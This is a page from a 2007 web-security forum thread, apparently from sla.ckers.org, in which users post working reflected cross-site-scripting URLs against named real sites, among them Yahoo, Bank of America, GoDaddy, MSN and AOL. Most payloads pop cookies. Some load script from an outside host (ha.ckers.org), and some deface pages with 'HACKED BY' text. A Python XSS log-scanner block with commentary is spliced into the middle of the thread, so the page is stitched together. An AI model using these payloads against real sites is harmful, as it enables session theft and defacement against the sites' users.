Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 42 of 65
Re: So it begins
Posted by: tx
Date: March 09, 2007 11:59PM

I probably should've made that clearer... I've edited the post as such

-tx @ lowtech-labs.org

Re: So it begins
Posted by: trev
Date: March 10, 2007 07:54PM

Yahoo once again: http://siteexplorer.search.yahoo.com/search?p=http%3A%2F%2Fgoogle.com%22style%3D%22-moz-binding%2F**%2F%3Aurl%28http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29&bwm=i

Re: So it begins
Posted by: tx
Date: March 10, 2007 08:03PM

Salon:
http://www.salon.com/news/cookie756.html?URL=/%22%7D%0A%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%0A%7B%2F%2F
http://search.salon.com/salonsearch.php?search=%00%3Cscript%3Ealert('xss');%3C/script%3E&breadth=salon

EDIT: Added another one from http://astrocenter.astrology.msn.com. Note: This is different from the one thomaspollet posted last October http://sla.ckers.org/forum/read.php?3,44,1458#msg-1458 (which still hasn't been fixed, btw), mainly in that it's POST as opposed to GET, and in that msn is nice enough to store the variable as a cookie (PreProfil) that expires in 2017 so it persists after the user has closed their browser.
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?AutomateState=&URLAfterSuccededSubmit=http%3A%2F%2Fastrocenter.astrology.msn.com%2Fmsn%2FMyToday.aspx%3FAf%3D-1000&FirstName=%22%3Balert(document.cookie)%3B%2F%2F&GenderSelector=1&MonthSelector=1&DaySelector=2&YearSelector=1942&Submit=Go

-tx @ lowtech-labs.org



Edited 6 time(s). Last edit at 03/10/2007 09:20PM by tx.

Re: So it begins
Posted by: trev
Date: March 10, 2007 10:02PM

All those parked domains, they must be good for something...

http://vonea.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://admedia.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://ampea.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://wexea.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://hangovercombat.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://www.magnamedia.us/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://affiliate-viral-marketing.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://forea.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://cyberdyaryo.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://lifetodigital.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://kent2do.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://badfood.org/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://eurobytes.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E

Several hundred more of those: http://www.google.com/search?q=%22To+inquire+about+this+domain%22+%22Related+searches%22

http://logisticsolutions1980.com/ct.html?u=http://google.com/%22%20style=%22-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)&e=1
http://tucsons1stoprealtors.com/ct.html?u=http://google.com/%22%20style=%22-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)&e=1
http://www.buybritneyshair.com/ct.html?u=http://google.com/%22%20style=%22-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)&e=1
http://jybe.com/ct.html?u=http://google.com/%22%20style=%22-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)&e=1
http://pansoftware.com/ct.html?u=http://google.com/%22%20style=%22-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)&e=1

A million more of those: https://www.tdnam.com/

http://www.chestertonholdings.com/inquire.php?inquiry_domain=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.inquireaboutthisdomain.com/?domainname=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.sedo.com/search/searchresult.php4?keyword=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E
http://washingtondcdental.com/%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E.cfm?t=5
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://hus.parkingspa.com/handcrafted2.asp&search_text=%22%22%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E&search_source=60 [hus.parkingspa.com]
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.industrydomains.com/&email=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E [industrydomains.com]



Edited 3 time(s). Last edit at 03/10/2007 10:44PM by trev.

Re: So it begins
Posted by: tx
Date: March 11, 2007 06:18AM

*yawn* I'm drunk and tired...

but not too drunk for this: http://www.macfixitforums.com/postlist.php?Cat=&Board=Forum35%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3B%2F%2F heh, macs...

EDIT: https://onlineeast2.bankofamerica.com/cgi-bin/ias/0/E/EnrollEntryPoint?stateCode=AL%22;alert('xss');//
g'nite interwebs

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 03/11/2007 06:43AM by tx.

Re: So it begins
Posted by: rsnake
Date: March 12, 2007 05:39PM

Yay macs!

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: trev
Date: March 12, 2007 06:04PM

Requires user interaction:

[groups.google.com]

Click "More options" twice.

Re: So it begins
Posted by: SW
Date: March 12, 2007 11:23PM


Re: So it begins
Posted by: digi7al64
Date: March 12, 2007 11:31PM

http://qdb.hacktthissite.org/home.php?q=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: rsnake
Date: March 13, 2007 11:48AM

haha, nice!

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: FR3DC3RV
Date: March 13, 2007 04:29PM

http://www.blackeyedpeas.com/home/news/?searchTerms=%22%3E%3Cp%3EXSS+HACKED+BY+FR3DC3RV%3Cp%3E&submit=++Search++&categoryID=0&startDateMonth=3&startDateDay=3&startDateYear=2002&userLogin=&endDateMonth=3&endDateDay=13&endDateYear=2007&resultsPerPage=30&orderField=2&order=2

Search "><script>alert(document.cookie)</script>:
http://farejador.ig.com.br/busca.do
or
http://www.emf.no-ip.com/portal/search.html
or
http://www.u2.com/login.php

http://www.u2.com/search/index.php?keyword=%22%3E%3Cp%3E%3Cb%3EHOW+TO+DISMANTLE+AN+U2+WEBSITE%3F%3C%2Fp%3E%3Cp%3EHACKED+BY+FR3DC3RV%3C%2Fp%3E%3C%2Fb%3E&match=all&s_table=news&submit=1

-------------------------------
http://fr3dc3rv.blogspot.com



Edited 1 time(s). Last edit at 03/13/2007 04:54PM by FR3DC3RV.

Re: So it begins
Posted by: trev
Date: March 14, 2007 09:05AM

http://add.yahoo.com/fast/help/us/widgets/cgi_feedback?email=%22style%3D%22-moz-binding%3Aurl%28http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29%22

Re: So it begins
Posted by: tx
Date: March 14, 2007 07:19PM

More Godaddy:
https://email.secureserver.net/login.php?domain=sla.ckers.org%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3Cp%20id=%22
https://idp.securepaynet.net/login.aspx?prog_id=xss&spkey=SPSWB116&login=&target=secure_transfer.asp&myaurl=&'onmouseover='alert(document.cookie%29 Mouseover 'Home' or the promotional links near the bottom of the page
https://idp.godaddy.com/shopper_new.aspx?pathway=01280d32-4185-4a35-aa98-022667f3a443&SPKey=GDDNAEB03&myaurl=&'onmouseover='alert(document.cookie%29 Mouseover any link in the form

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 03/14/2007 07:30PM by tx.

Re: So it begins
Posted by: Kyran
Date: March 15, 2007 12:29PM

http://support.alcohol-soft.com/en/knowledgebase.php?postid=25209&title=%3Cscript%3Ealert(1)%3C/script%3E

- Kyran

Re: So it begins
Posted by: daltd
Date: March 18, 2007 05:25AM

www.mtv.com: http://www.mtv.com/sitewide/utils/gamespot/gs_scripts.jhtml?gamespotURL=%22%3E%3Ctitle%3EMTV.com%20-%20XSS%20PoC%20-%20daltd%3C%3C//title%3E%3Cscript%3Ealert('XSS');%3C/script%3E
sony.mtv.com: http://sony.mtv.com/sony_moviemixer.php?src=sony_moviemixer.phpx&door=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E
videogames1.mtv.com: http://videogames1.mtv.com/pages/gamespace/story.php?pid=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E&id=6121675&page=9



Edited 1 time(s). Last edit at 03/18/2007 05:45AM by daltd.

Re: So it begins
Posted by: trev
Date: March 18, 2007 11:57AM

http://www.flashback.info/leave.php?google.com/"/onclick="alert('xss') - for Internet Explorer, click "gå videre"

Re: So it begins
Posted by: Henaro
Date: March 18, 2007 09:58PM

http://www.authpro.com/cgi-bin/auth.fcgi?user=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Re: So it begins
Posted by: beford
Date: March 19, 2007 02:52PM

http://research.microsoft.com/adapt/MSBNx/MSBNxManual.asp?path=x%22+onload=%22alert(/xss/);//



Edited 2 time(s). Last edit at 03/19/2007 02:54PM by beford.

Re: So it begins
Posted by: Henaro
Date: March 19, 2007 03:17PM

Take this college board!

http://apps.collegeboard.com/search/quicksearch.jsp?formState=1&word=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

You and your SATs. >:(

Re: So it begins
Posted by: christ1an
Date: March 19, 2007 03:53PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?

add this after xss_post_forwarder.php?
xss_target=http://faq.gmx.de/search/q.php&top=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&query=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}



Edited 1 time(s). Last edit at 03/19/2007 03:54PM by christ1an.

Re: So it begins
Posted by: jungsonn
Date: March 21, 2007 05:07PM

Wow still busy with these finds? ^^ you diehards! :)

Re: So it begins
Posted by: beford
Date: March 21, 2007 08:05PM

hxxps://broadband.msn.com/account/index.asp?email=email@ya.com%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

I have not tested this one; however, it should work on IE.
hxxps://broadband.msn.com/account/rebate_center.asp?email=lolzor@gmail.com%22+style=%22background-image:%20url(javascript:alert('XSS'))

Re: So it begins
Posted by: trev
Date: March 22, 2007 05:10AM

Yes, the second one works in IE - but only if you click "ok" on the warning (the web page uses SSL and this image is supposedly not transferred via SSL).



Edited 1 time(s). Last edit at 03/22/2007 07:28AM by trev.
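The payload shapes posted throughout this thread (a quote break-out followed by a script tag, an injected event-handler attribute, -moz-binding inside an injected style attribute, and, as in the two posts just above, javascript: inside a CSS url()) give a defender something concrete to look for in web access logs. The scanner below is an added example, not code from the thread or from any of the sites named in it; its signature set is an assumed starting point rather than a complete XSS grammar, and the sample requests use example.com hosts and are constructed to mirror the thread's patterns.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit
# Payload shapes posted in this thread: quote break-out + <script>, event-handler attributes,
# -moz-binding in an injected style attribute, javascript: inside CSS url(). Assumed set.
SIGNATURES = {
    "script_tag": re.compile(r"<\s*/?\s*script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "moz_binding": re.compile(r"-moz-binding\s*:", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "js_call": re.compile(r"\b(?:alert|String\.fromCharCode)\s*\(", re.I),
}

def decode_fully(value, max_rounds=3):
    """Percent-decode until stable (bounded) so double-encoded values and hex-encoded tag
    names such as %3C%73%63%72%69%70%74%3E surface as plain text."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\x00", "")  # drop NUL bytes used as a filter-confusing prefix

def scan_url(url):
    """Return sorted (location, signature) pairs for one request URL; [] when clean."""
    parts = urlsplit(url)
    fields = [("path", parts.path), ("fragment", parts.fragment)]
    # keep_blank_values so a parameter that is nothing but payload is not dropped; the
    # name is scanned as well because payloads such as &'onmouseover='... land in it
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        fields.append((f"query:{name}", f"{name}={value}"))
    hits = set()
    for location, raw in fields:
        text = decode_fully(raw)
        for sig_name, pattern in SIGNATURES.items():
            if pattern.search(text):
                hits.add((location, sig_name))
    return sorted(hits)

def flag_requests(urls):
    """Reduce a list of request URLs (e.g. from an access log) to the flagged ones."""
    return [url for url in urls if scan_url(url)]

SAMPLE_REQUESTS = [  # constructed, modelled on the thread's payload shapes; example hosts
    "http://search.example.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E",
    "http://ads.example.com/ct.html?u=http://example.org/%22%20style=%22-moz-binding:url(http://xbl.example/x.xml%23xss)&e=1",
    "https://login.example.com/login.aspx?myaurl=&'onmouseover='alert(document.cookie%29",
    "https://account.example.com/index.asp?email=a@b.test%22+style=%22background-image:%20url(javascript:alert('XSS'))",
    "http://forum.example.com/postlist.php?Board=Forum35%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29",
    "http://shop.example.com/search.php?q=blue+jeans&page=2",
]
```

Signature matching of this kind is a triage aid for logs, not a substitute for output encoding on the server; the browser-specific vectors in this thread (-moz-binding, javascript: in CSS) show why a filter tuned to `<script>` alone misses real reflections.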

Re: So it begins
Posted by: Anonymous User
Date: March 22, 2007 06:25AM

I tried the 2nd one in IE7. It's not working...

Re: So it begins
Posted by: epsteinbar
Date: March 22, 2007 08:24PM

http://www.snapfiles.com/downloadfind.php?st='';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}

http://www.javabrewingco.com/search_results.asp?txtsearchParamType=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}



Edited 2 time(s). Last edit at 03/22/2007 08:28PM by epsteinbar.

Re: So it begins
Posted by: ma1
Date: March 23, 2007 07:57PM

I'm really interested in knowing if any of these POCs, possibly combined with any of the known launch techniques, could work as a reflected XSS from an untrusted origin to a whitelisted website, meant to evade the NoScript block (against the latest anti-XSS development version).

All those I've tried so far do fail, but again I'm all ears for effective evasion approaches (other than social engineering).

Many thanks!

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: So it begins
Posted by: kirke
Date: March 24, 2007 04:26AM

nice place for spoofing:
https://my.screenname.aol.com/_cqr/login/login.psp?mcState=initialized&mcState=initializ');alert('XSS');alert('add%20more%20XSS%20here%20%20--%20d&sitedomain=my.screenname.aol.com&authLev=1&siteState=**getOneFree.psp&lang=de&locale=null

There are some more injection places if you look at the returned page.
The strange part is that you get different results for Mozilla and IE, probably due to different handling of JavaScript errors.

Re: So it begins
Posted by: FR3DC3RV
Date: March 24, 2007 05:17AM

http://www.tiinside.com.br/Pesquisa.asp?Num_Linhas=20&Texto=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&Onde=Tx
http://www.looksheetmusic.com/search.php?q=%22%3E%3Cscript%3Ealert%28%2FXSS+HACKED+BY+FR3DC3RV%2F%29%3C%2Fscript%3E&submitted=true&orderbyA=&vsmA=1&smpA=1&mnA=1&musicroomA=1&stagepassA=1

Insert "><script>alert(document.cookie)</script> as your email.
https://www.sign-up.to/signup.php?fid=1402&pid=1071

Insert "><script>alert(document.cookie)</script> as your email or " onclick=javascript:alert(document.cookie)// as your nickname:

http://ogame475.de/game/reg/new.php

-------------------------------
http://fr3dc3rv.blogspot.com

Re: So it begins
Date: March 26, 2007 03:17AM

The site's glossary feature:
http://www.teenwire.com/glossary/glossary-definition.php?term=<script>alert(String.fromCharCode(34,84,117,114,110,32,111,110,46,32,84,117,110,101,32,105,110,46,32,68,114,111,112,32,111,117,116,46,34));</script>

The site's Planned Parenthood location area:
http://www.teenwire.com/clinics/cl-zip.php?%7ENum-Len-5%7EZip_Code="><script>alert(String.fromCharCode(34,72,101,121,32,104,101,121,32,73,32,119,97,110,116,101,100,32,67,104,105,110,101,115,101,32,116,97,107,101,97,119,97,121,33,32,72,101,121,32,104,101,121,33,32,87,111,111,32,119,111,111,32,119,111,111,33,34));</script>&x=10&y=5

The site's login area.
http://www.teenwire.com/login/
You can inject simple HTML to disrupt the page, like XMP, via a POST request, but I doubt much can be accomplished on this one.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: So it begins
Date: March 26, 2007 03:50PM

http://www.opendiary.com/searchresults.asp?searchstring=%3Cscript%3Ealert(0)%3C/script%3E
